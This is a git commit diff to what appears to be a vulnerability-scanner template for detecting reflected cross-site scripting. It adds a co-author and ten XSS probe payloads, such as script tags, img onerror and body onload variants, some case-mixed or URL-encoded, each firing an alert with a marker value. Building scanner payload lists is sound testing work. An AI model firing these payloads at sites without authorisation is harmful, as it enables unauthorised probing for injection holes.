Update reflected-xss.yaml

2024-05-03 12:47:54 +05:30 · 2024-05-03 12:47:54 +05:30 · f9ac5caa19
parent 193435f17e
commit f9ac5caa19
1 changed files with 12 additions and 2 deletions
--- a/dast/vulnerabilities/xss/reflected-xss.yaml
+++ b/dast/vulnerabilities/xss/reflected-xss.yaml
@ -2,7 +2,7 @@ id: reflected-xss

 info:
  name: Reflected Cross Site Scripting
-  author: pdteam
+  author: pdteam, 0xKayala
  severity: medium
  tags: xss,rxss,dast

@ -18,6 +18,16 @@ http:
    payloads:
      reflection:
        - "'\"><{{first}}"
+        - "<img src=x onerror=alert({{first}})>"
+        - "<script>alert({{first}})</script>"
+        - "'><ScRiPt>alert({{first}})</sCrIpT>"
+        - "</script><ScRiPt>alert({{first}})</sCrIpT>"
+        - "</script><script>alert({{first}})</script>"
+        - "<body onload=alert({{first}})>"
+        - "<marquee><img src=x onerror=confirm({{first}})></marquee>"
+        - "'><img%20src=xxx:x%20\x20onerror=javascript:alert({{first}})>"
+        - "'\/><img%20s+src+c=x%20on+onerror+%20="alert({{first}})"\>"
+        - "'%3e%3cscript%3ealert({{first}}*{{first}})%3c%2fscript%3eejj4sbx5w4o"

    fuzzing:
      - part: query